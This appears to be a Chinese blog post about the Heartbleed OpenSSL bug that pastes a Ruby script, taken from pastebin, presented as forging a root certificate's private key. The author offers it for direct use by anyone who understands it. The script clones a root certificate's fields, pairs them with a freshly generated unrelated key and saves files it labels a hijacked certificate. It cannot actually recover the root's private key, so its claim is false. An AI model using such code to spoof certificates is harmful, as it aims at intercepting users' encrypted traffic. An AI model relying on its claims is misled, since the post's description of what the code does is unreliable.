前段时间的openssl heartbleed 让我们心惊胆战的过了几天。
从用户数据泄露到 OpenSSL周边产品,从服务端到客户端, 从https 私钥泄露到 openvpn 、openssh 、sftp 等私钥泄露。很多地方我们无能为力。
太多的用户都认为https 就是安全的了, 在此之前也有各种各样的中间人攻击出现
下面我也贴段代码给大家看看。是 Ruby OpenSSL 的私钥伪造。
为了社会的和谐,具体用法我就不说了。能看懂的直接拿去用…
require 'rubygems' require 'openssl' require 'digest/md5' key = OpenSSL::PKey::RSA.new(2048) cipher = OpenSSL::Cipher::AES.new(256, :CBC) ctx = OpenSSL::SSL::SSLContext.new puts "Spoof must be in DER format and saved as root.cer" raw = File.read "root.cer" cert = OpenSSL::X509::Certificate.new raw cert.version = 2 ef = OpenSSL::X509::ExtensionFactory.new ef.issuer_certificate = OpenSSL::X509::Certificate.new raw cert.subject = ef.issuer_certificate.subject ef.subject_certificate = ef.issuer_certificate cert.issuer = ef.issuer_certificate.issuer cert.serial = ef.issuer_certificate.serial ctx.key = ef.issuer_certificate.public_key cert.public_key = ef.issuer_certificate.public_key cert.not_after = ef.issuer_certificate.not_after cert.not_before = ef.issuer_certificate.not_before cert.extensions = ef.issuer_certificate.extensions a = File.open("root"".key", "w") a.syswrite("#{cert.public_key}") a.syswrite("#{key.to_pem}") spoof = OpenSSL::PKey::RSA.new File.read 'root.key' printf "Verifying Keys Work: " puts spoof.private? ctx.cert = ef.issuer_certificate puts "=============================================================" root = ef.issuer_certificate.sign(spoof, OpenSSL::Digest::SHA1.new) filer = File.open("#{cert.serial}"".key", "w") filer.syswrite("#{spoof.to_pem}") file = File.open("spoof"".cer", "w") file.syswrite("#{cert.to_der}") files = File.open("#{cert.serial}"".pem", "w") files.syswrite("#{cert.to_pem}") files.syswrite("#{spoof.to_pem}") puts "Hijacked Certificate with chainloaded key saved @ #{cert.serial}.pem" printf "Verifying Keys Intergity: " puts root.verify(key)
[Via http://www.pastebin.com/SQQXeAmF]